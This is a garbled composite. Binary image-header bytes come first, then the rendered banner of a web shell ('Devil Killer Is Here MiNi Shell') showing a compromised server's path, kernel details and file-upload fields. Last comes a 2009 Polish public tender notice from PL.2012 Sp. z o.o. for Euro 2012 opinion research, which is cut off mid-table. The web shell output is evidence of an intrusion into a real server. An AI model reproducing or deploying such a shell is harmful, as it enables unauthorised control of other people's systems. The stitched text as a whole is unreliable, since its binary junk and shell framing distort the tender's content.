JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090224/41915-N-2009.html

<p class="kh_header"><b>Warszawa: Realizacja ilościowych i jakościowych badań społecznych i marketingowych na potrzeby PL.2012 Sp. z o.o., nr postępowania: 26/UM/01/2009/P</b><br>
<b>Numer ogłoszenia: 41915 - 2009; data zamieszczenia: 24.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PL 2012 sp. z o. o. , ul. Wybrzeże Gdyńskie 4, 01-531 Warszawa, woj. mazowieckie, tel. 022 5603710, faks 022 5603755.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.2012.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w szczególnym celu zaspokajania potrzeb o charakterze powszechnym..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja ilościowych i jakościowych badań społecznych i marketingowych na potrzeby PL.2012 Sp. z o.o., nr postępowania: 26/UM/01/2009/P.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa realizacji ilościowych i jakościowych badań społecznych i marketingowych na potrzeby PL.2012 Sp. z o.o.. 

3.1.	Tło badania

Spółka PL.2012 to spółka celowa Skarbu Państwa, której właścicielem jest Minister Sportu i Turystyki. Przedmiotem działalności PL. 2012 jest prowadzenie, koordynowanie  i nadzorowanie wszystkich przedsięwzięć związanych z realizacją projektu zorganizowania w Polsce i na Ukrainie Mistrzostw Europy UEFA EURO 2012  . 
Szczegółowe informacje o spółce PL.2012 Sp. z o.o. dostępne są na stronie http://www.2012.org.pl .

3.2.	Opis 4 badań będących przedmiotem zamówienia.

3.2.1.	Ogólnopolski monitoring nastrojów społecznych Wokół UEFA EURO 2012 

3.2.1.1.	Cel badania
Celem badania jest monitoring  nastrojów społecznych związanych z organizacją UEFA EURO 2012 .
Szczegółowe cele badania obejmują między innymi poznanie: 
-	Poziomu optymizmu społecznego - nadzieje i obaw związanych z UEFA EURO 2012 
-	Poziomu poparcia społecznego dla organizacji mistrzostw w Polsce
-	Korzyści płynących z organizacji mistrzostw piłki nożnej w skali makro i mikro - dla Polski, regionu, osobiście
-	Źródła informacji o UEFA EURO 2012  i oraz ich  ocena 
-	Ocena bieżących wydarzeń związanych z przygotowaniem do UEFA EURO 2012 

3.2.1.2.	Metoda badawcza
Badanie będzie realizowane  metodą wywiadu bezpośredniego, wspomaganego komputerem CAPI, w domu respondenta w ramach tzw. badania omnibusowego. Zakłada się 4 - krotny pomiar w ciągu roku 2009 ( 1 raz w kwartale) . Szacowana liczba pytań zamkniętych w poszczególnych pomiarach :

-	1 kwartał - blok  8 pytań
-	2 kwartał -  blok 14 pytań
-	3 kwartał - blok  8 pytań
-	4 kwartał - blok 15 pytań

Dopuszcza się  zmianę liczby pytań w poszczególnych pomiarach. Roczna liczba pytań nie przekroczy 45 (+ standardowy blok pytań metryczkowych zawartych w badaniach typu omnibus).  W każdym bloku tematycznym będzie zamieszczonych 6 pytań powtarzalnych w każdym kwartale. Szacunkowy podział 45 pytań zamkniętych :
50% proste pytania z wykorzystanie 5- stopniowej skali odpowiedzi
50% pytania wieloodpowiedziowe lub wieloitemowe ( do 10 itemów)

3.2.1.3.	Próba badania
Każdy z pomiarów badania będzie realizowany na losowej reprezentatywnej próbie mieszkańców Polski w wieku 15 lat i więcej liczącej około 1000 osób.

3.2.1.4.	Harmonogram i zakres prac.
Wykonawca przedstawi zamawiającemu harmonogram realizacji badań omnibusowych w roku 2009 i zaproponuje harmonogram dla PL.2012. Harmonogram realizacji powinien określać termin składania pytań, realizacji oraz otrzymania wyników i raportu. Zamawiający wymaga, aby pierwszy pomiar został zrealizowany w miesiącu marcu 2009 Raport powinien zostać dostarczony nie później niż 15 kwietnia 2009
 Zakres prac związanych z przygotowaniem, realizacją i opracowaniem wyników każdego z pomiarów obejmuje:
-	przygotowanie w uzgodnieniu  z  Zamawiającym  kwestionariusza 
-	realizację i kontrolę badania w terenie  
-	weryfikację ankiet  
-	wprowadzanie i statystyczne opracowanie danych 
-	dostarczenie raportu w języku polskim  wraz z tabelami  prezentującymi rozkłady odpowiedzi w badanej populacji i   zróżnicowania ze względu na cechy społeczno-demograficzne badanych 
-	ustną prezentację w siedzibie Zamawiającego 


Zamawiający oczekuje, że Wykonawca każdorazowo przedstawi wyniki dotyczące nastrojów społecznych związanych z przygotowaniem do UEFA EURO 2012   na tle innych wskaźników nastrojów społecznych (za rok 2009 - pomiary przynajmniej raz w miesiącu ) to znaczy oceny stanu gospodarki, materialnych warunków życia ludzi, oceny działań rządu, premiera, prezydenta.
 Ustna prezentacja wyników badania odbędzie się w siedzibie Zamawiającego w terminie ustalonym z Zamawiającym.
 
3.2.2.	 Regionalny monitoring nastrojów społecznych Wokół Euro 2012 

3.2.2.1.	Cel badania
Celem badania jest  poznanie nastrojów społecznych związanych z organizacją UEFA EURO 2012   w Polsce wśród mieszkańców regionów/miast organizatorów  mistrzostw 
Szczegółowe cele badania obejmują poznanie: 
-	Poziomu optymizmu społecznego - nadzieje i obaw związanych z UEFA EURO 2012 
-	Poziomu poparcia społecznego dla organizacji mistrzostw w Polsce, regionie
-	Korzyści płynących z organizacji mistrzostw piłki nożnej w skali makro i mikro - dla Polski, miasta, osobiście
-	Chęci zaangażowania się społeczności lokalnej w przygotowania do UEFA EURO 2012 
-	Źródła informacji o UEFA EURO 2012  i ich  ocena w wymiarze regionalnym 
-	Oceny bieżących wydarzeń związanych z przygotowaniem do UEFA EURO 2012 

3.2.2.2.	Metoda badawcza
Badanie ilościowe - CATI (Computer-Assisted Telephone Interviewing - wywiad telefoniczny ze wspomaganiem komputerowym) składający się z 10  pytań zamkniętych oraz 4 pytań metryczkowych, czas trwania wywiadu maksymalnie 10 minut.

3.2.2.3.	Próba badania
Losowa reprezentatywna próba mieszkańców miast (w wieku 15 lat i więcej):
-	Warszawa (N=500),
-	Kraków(N=500),
-	Poznań (N=500),
-	Wrocław (N=500),
-	Gdańsk(N=500),
-	aglomeracja śląska (N=500).
Łączna ilość wywiadów N= 3000.

3.2.2.4.	Harmonogram i zakres prac.
Zakłada się iż realizacja badania rozpocznie się w 4 kwartale 2009 roku. . Zakres prac związanych z przygotowaniem badania:
-	przygotowanie narzędzia (praca nad kwestionariuszem),
-	wylosowanie próby, przygotowanie skryptu,
-	przeszkolenie ankieterów.
Wyniki badania powinny zostać przekazane PL.2012 w formie tablic statystycznych i raportu w języku polskim. Ustna prezentacja wyników badania odbędzie się w siedzibie Zamawiającego w terminie ustalonym z Zamawiającym.


3.2.3.	Badanie wizerunku przygotowań do UEFA EURO 2012  

3.2.3.1.	Cel badania

Celem badania jest  poznanie ocen liderów opinii społecznej związanych z przygotowaniami UEFA EURO 2012  

Szczegółowe cele badania obejmują między innymi poznanie: 
-	Zainteresowania tematyką przygotowań do UEFA EURO 2012 
-	Stan u poinformowania, źródła zdobywania informacji o UEFA Euro 2012 
-	Kluczowych obszarów dla powodzenia projektu 
-	Oceny stanu przygotowań Polski do UEFA EURO 2012 
-	Wiedzy o podziale kompetencji miedzy poszczególnymi instytucjami (UEFA, PZPN, MSiT, PL.2012, miasta - gospodarzy)
-	Oceny działań/aktywności/zaangażowania poszczególnych miast - gospodarzy 
-	Największych zagrożeń/ryzyka związane z organizacją UEFA EURO 2012 
-	Korzyści i obaw związanych z organizacją UEFA EURO 2012 
 
3.2.3.2.	 Metoda badawcza

Projekt będzie realizowaną metodą pogłębionych wywiadów indywidualnych (IDI)

3.2.3.3.	Próba badania
Zakłada się realizację 25 wywiadów w Warszawie - czas trwania jednego wywiadu około 90 minut. Wykonawca przeprowadzi 3 IDI z możliwością ich obserwacji  przez Zamawiającego (np. w salach wyposażonych w lustra weneckie).Pozostałe 22 IDI Wykonawca może przeprowadzić w miejscu uzgodnionym z respondentem
Wykonawca w porozumieniu z Zamawiającym zaproponuje listę 25 osób - ekspertów, liderów opinii np.:  posłów, senatorów, biznesmenów, przedstawicieli związków sportowych, dziennikarzy, sportowców, z którymi zostanie przeprowadzony wywiad

3.2.3.4.	Harmonogram i zakres prac.
Badanie będzie realizowane w 2 kwartale 2009
Zakres prac związanych z przygotowaniem, realizacją i opracowaniem wyników obejmuje:
-	przygotowanie w uzgodnieniu  z  Zamawiającym scenariusza wywiadu 
-	rekrutację i wynagrodzenie osób biorących udział w badaniu 
-	realizację wywiadów indywidualnych
-	przygotowanie transkrypcji i przekazanie w wersji elektronicznej Zamawiającemu

Wyniki badania powinny zostać przekazane PL.2012 w formie raportu w języku polskim. Ustna prezentacja wyników badania odbędzie się w siedzibie Zamawiającego w terminie ustalonym z  Zamawiającym, 

3.2.4.	Badanie strony internetowej PL.2012  oraz ankieta pop - up wśród internautów. 

3.2.4.1.	Cel badania 
Celem badania jest  ocena atrakcyjności i funkcjonalności serwisu internetowego www.2012.org.pl oraz  skuteczności komunikacji w obszarze zadań spółki  

Badania mają na celu  dostarczenie informacji niezbędnych do optymalizacji serwisu internetowego PL.2012 oraz  identyfikację kluczowych aspektów wpływających na satysfakcję i lojalność użytkowników. Zamawiający oczekuje rekomendacji w zakresie ewentualnych udoskonaleń aktualnej strony w obszarze nawigacji, treści, i estetyki  

Szczegółowe cele badania obejmują: 

-	Określenie rodzaju informacji poszukiwanych przez odwiedzających strony, optymalizacja dostarczanych informacji dla różnych grup celowych
-	Zdefiniowanie sposobu wyszukiwania tych informacji
-	Diagnoza najczęściej popełnianych błędów
-	Określenie zrozumienia strony i treści podstron
-	Wskazówki dotyczące optymalizacji struktury nawigacji
-	Dopasowanie grafiki do wizerunku  

Szczegółowa analiza serwisu powinna zostać wzbogacona ( w trakcie badań jakościowych)poprzez porównanie kilku 2-3 stron o podobnej tematyce np.
 
www.sport.pl
www.sports.pl
www.sport.onet.pl
www.pzpn.pl
www.msport.gov.pl
www.stadioncity.pl
www.euroraport.pl
www.euro2012-pl.org
www.euro2012.pilkarze.net
www.90minut.pl
www.sportowefakty.pl
http://www.europoznan2012.pl/
http://www.2012.wroc.pl/
http://bieg2012.pl/
www.msz.gov.pl
www.paiz.gov.pl
http://www.pot.gov.pl/
www.ukie.gov.pl
http://www.parp.gov.pl/
 


3.2.4.2.	Metoda badania

1.	Badanie jakościowe (Focus Group Interviev FGI )  pozwalające na ocenę atrakcyjności i funkcjonalności serwisu internetowego  ( 2 grupy dyskusyjne po 120 minut ) 
2.Badania on-line wśród użytkowników strony ( dwie wersje ankiety - polska i angielska) ; szacowana długość wypełniania kwestionariusza około 5-7 minut ( 7 zamkniętych pytań ankiety + 8 pytań metryczkowych)

3.2.4.3.	Próba badawcza (FGI) 

Badani będą przedstawiciele 2 grup docelowych ( po 6 - 8 osób na jednym FGI) 

1 grupa
Aktywni internauci korzystający z różnych narządzi internetowych, zainteresowani sportem, kibice odwiedzający stadiony, wykształcenie co najmniej średnie, mężczyźni w wieku 25-35 lat,

2 grupa
Dziennikarze prasowi, radiowi, telewizyjni zajmujący się tematyką UEFA EURO 2012  w różnym kontekście  ( np. sportowym, ekonomicznym, społecznym)korzystający w swojej pracy z Internetu 
Miejsce realizacji : Warszawa, sale fokusowe wyposażone w lustro weneckie 

3.2.4.4.	Harmonogram i zakres prac

Zamawiający zakłada, że realizacja badania rozpocznie się w 2 kwartale 2009.
FGI

Zakres prac związanych z przygotowaniem, realizacją i opracowanie wyników obejmuje:
-	przygotowanie w uzgodnieniu  z  Zamawiającym scenariusza grupy dyskusyjnej 
-	rekrutację i wynagrodzenie osób biorących udział w badaniu realizacja 
-	realizację  grup dyskusyjnych

Wyniki badania powinny zostać przekazane PL.2012 w formie raportu w języku polskim. Ustna prezentacja wyników badania odbędzie się w siedzibie Zamawiającego w terminie ustalonym z Zamawiającym, 
Badania on-line 
 Zakłada się  osiągnięcie 1000 wypełnionych ankiet 

-	Realizacja badania- w zależności od ruchu na stronie - zakłada się utrzymanie ankiety przez minimum 3 miesiące
Raportowanie 2-krotne,. Zamawiający oczekuje pierwszej analizy wyników po uzyskaniu minimum 500 wypełnionych ankiet.

3.3.	Wymagania Zamawiającego dotyczące badań typu Omnibus oraz systematycznego pomiaru nastrojów społecznych.

Zamawiający, w celu prawidłowego wykonania przedmiotu zamówienia wymaga by Wykonawca zagwarantował, że w trakcie obowiązywania umowy pomiędzy stronami będzie:
a.	systematycznie (przynajmniej raz w miesiącu) realizował badania typu Omnibus na losowych reprezentatywnych próbach losowych dorosłej ludności Polski N=1000;
b.	systematycznie (przynajmniej raz w miesiącu) przeprowadzał pomiar nastrojów społecznych dotyczący ocen sytuacji gospodarczej kraju, warunków materialnych społeczeństwa, rządu, premiera, prezydenta..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.32.00.00-3, 79.31.50.00-5.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
1.	badania co najmniej 3 usług polegających na realizacji badania jakościowego ( każdy z projektów - minimum 10 wywiadów (IDI) ) wśród liderów opinii społecznej np. posłów, senatorów, biznesmenów itp.
2.	badania co najmniej 5 usług polegających na wykonaniu metodą CATI (Computer -Assisted Telephone Interviewing - wywiad telefoniczny ze wspomaganiem komputerowym) usługi ilościowych badań opinii publicznej o dowolnej tematyce, na próbie respondentów n=500 lub więcej
Zamawiający wymaga by wykonawca wraz z wykazem usług, o których mowa w pkt. 1 i 2  załączył dokumenty potwierdzające, że wymienione usługi zostały wykonane należycie.
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
Ocena spełniania tych warunków będzie polegała na ocenie spełnia / nie spełnia. Podstawą oceny będą dokumenty, o których mowa w punkcie 9 ogłoszenia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
9.1.	W celu spełniania warunków, o których mowa w punkcie 8 ogłoszenia należy złożyć: 
a)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, (oryginał lub kserokopię potwierdzoną za zgodność z oryginałem przez upełnomocnionego przedstawiciela wykonawcy, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w licytacji elektronicznej;
b)	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w licytacji elektronicznej. 
c)	Wypełniony i podpisany Wniosek o dopuszczenie do licytacji elektronicznej - na formularzu stanowiącym Załącznik nr 1 do ogłoszenia.
d)	Wypełniony i podpisany Formularz Wykonawcy stanowiący Załącznik nr 2 do ogłoszenia. 
e)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
1.	 3 usług polegających na realizacji badania jakościowego ( każdy z projektów - minimum 10 wywiadów (IDI) ) wśród liderów opinii społecznej np. posłów, senatorów, biznesmenów itp.
2.	5 usług polegających na wykonaniu metodą CATI (Computer -Assisted Telephone Interviewing - wywiad telefoniczny ze wspomaganiem komputerowym) usługi ilościowych badań opinii publicznej o dowolnej tematyce, na próbie respondentów n=500 lub więcej.
Zamawiający wymaga by wykonawca wraz z wykazem usług, o których mowa w pkt. 1 i 2  załączył dokumenty potwierdzające, że wymienione usługi zostały wykonane należycie.
Wykaz usług, o których mowa powyżej powinien zostać przedstawiony na formularzu stanowiącym Załącznik Nr 3 do ogłoszenia.
f)	Oświadczenie, o którym mowa w art. 44 Prawa zamówień publicznych podpisane przez upełnomocnionego przedstawiciela Wykonawcy - wzór oświadczenia stanowi Załącznik nr 4 do ogłoszenia; 
9.2.	Wniosek oraz wszystkie wymagane załączniki wymagają podpisu osób uprawnionych do reprezentowania firmy w obrocie gospodarczym, zgodnie z aktem rejestracyjnym i wymaganiami ustawowymi. 
9.3.	Jeżeli wniosek i załączniki zostaną podpisane przez upoważnionego przedstawiciela Wykonawcy należy dołączyć właściwe pełnomocnictwo lub upoważnienie przedstawione w formie oryginału, lub kopii poświadczonej za zgodność z oryginałem przez notariusza lub urzędowo.
9.4.	Poprawki we wniosku muszą być naniesione czytelnie oraz opatrzone podpisem osoby podpisującej wniosek. 
9.5.	Zamawiający dopuszcza do udziału w licytacji elektronicznej i zaprasza do składania ofert wszystkich Wykonawców, którzy spełniają warunki udziału w postępowaniu.
9.6.	Informacja o dopuszczeniu do udziału w licytacji elektronicznej przekazana zostanie Wykonawcom przez Pełnomocnika Zamawiającego na podany we Wniosku o dopuszczenie do udziału w postępowaniu adres e-mail do dnia 05.03.2009 r.
Wykonawcy dopuszczeni do udziału w licytacji elektronicznej będą zobligowani do wypełnienia formularza elektronicznego (odpowiednik formularza stanowiącego Załącznik Nr 2 do ogłoszenia WNIOSEK O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI) i przesłanie go do PWPW S.A na adres e-mail: aukcje@pwpw.pl nie później niż do dnia 06.03.2009 r.
Wzór formularza elektronicznego zostanie przesłany wraz z informacją o dopuszczeniu do udziału w licytacji elektronicznej przekazaną Wykonawcom przez Pełnomocnika Zamawiającego na podany we Wniosku o dopuszczenie do udziału w postępowaniu adres e-mail do dnia 05.03.2009 r..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> www.ppp.pwpw.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.2012.org.pl</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 4.1.	Wykonawcy składają, wraz z Wnioskiem o dopuszczenie do licytacji Formularz Wykonawcy.
4.2.	Po dopuszczeniu przez Zamawiającego do udziału w licytacji elektronicznej Wykonawcy zostaną zaproszeni do składania ofert, a ich dane zostaną przesłane do PWPW S.A. Wykonawcy dopuszczeni do udziału w licytacji elektronicznej otrzymają od PWPW S.A. drogą elektroniczną bezpłatne instrukcje obsługi licytacji elektronicznej oraz login i hasło dostępu do systemu PPP na stronie http://www.ppp.pwpw.pl.
4.3.	Zaproszenia do udziału w licytacji elektronicznej zostaną przekazane Wykonawcom przez Zamawiającego drogą elektroniczną na adres e-mail Wykonawcy wskazany w Formularzu Wykonawcy.
4.4.	Wykonawcy potwierdzą otrzymanie zaproszeń do udziału w licytacji drogą elektroniczną na adres e-mail osoby upoważnionej do kontaktu ze strony Zamawiającego.
4.5.	Minimalne wymagania techniczne urządzeń informatycznych używanych do dostępu do systemu PPP:
-	komputer klasy PC, 
-	system operacyjny Windows 2000 lub wyższy;
-	zegar 300Mhz, 64MB RAM; 
-	stałe łącze internetowe; 
-	przeglądarka Internet Explorer 5.5 bądź wyższa;
-	aplet java pobrany jednorazowo przy pierwszym połączeniu ze stroną;
-	wyłączona autoryzacja na serwerze proxy;
PWPW S.A. udziela informacji technicznych związanych z organizacją licytacji elektronicznej pod numerem telefonu (22) 530 27 96, e-mail: aukcje@pwpw.pl.</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 5.1.	Po zalogowaniu za pośrednictwem strony internetowej http://www.ppp.pwpw.pl do systemu PPP przy użyciu otrzymanego loginu i hasła, Wykonawcy uzyskują dostęp do aplikacji umożliwiającej składanie ofert. W czasie trwania licytacji Wykonawcy składają swoje oferty cenowe w postaci elektronicznej.
5.2.	Licytacja elektroniczna rozpoczyna się od ceny wywoławczej: 256 000,00 PLN brutto .
5.3.	Krok postąpienia (minimalna różnica ceny składanych ofert): wynosi: 3 000,00 PLN brutto.
5.4.	Oferty składane przez Wykonawców podlegają automatycznej klasyfikacji na podstawie ceny. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. W trakcie licytacji elektronicznej system PPP na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także cenach złożonych przez nich ofert.
5.5.	Zamawiający udzieli zamówienia Wykonawcy, który w toku licytacji elektronicznej zaoferował najniższą cenę.
5.6.	Zamawiający unieważni postępowanie, jeżeli:
-	wpłyną mniej niż dwa wnioski o dopuszczenie do licytacji elektronicznej,
-	w trakcie licytacji elektronicznej nie została złożona żadna oferta..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
